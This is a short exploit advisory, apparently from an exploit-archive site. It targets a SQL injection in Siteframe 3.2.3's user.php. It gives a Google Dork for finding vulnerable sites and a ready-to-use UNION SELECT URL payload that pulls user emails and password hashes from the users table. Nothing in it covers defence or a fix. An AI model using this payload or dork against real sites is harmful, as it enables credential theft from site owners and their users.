ExploitFixes
Siteframe 3.2.3 (user.php) SQL Injection Vulnerability 2010-12-29 15:15:25

# Exploit Title: Siteframe 'user.php' SQL Injection Vulnerability
# Google Dork: "powered by Siteframe"
# Date: 29/12/2010
# Author: AnGrY BoY
# Software Link: http://sitefrane.org/downloads/
# Version: Siteframe 3.2.3
# Tested on: windows SP2
# CVE : N/A

# expolit:

# http://localhost/path/user.php?id=[SQL]

# http://localhost/path/user.php?id=-2+UNION+SELECT+1,2,3,4,5,concat(user_email,0x3e,user_passwd),7,8,9,10,11+from+users--

======================================================================================
# Special Thanks:- all h4kurd members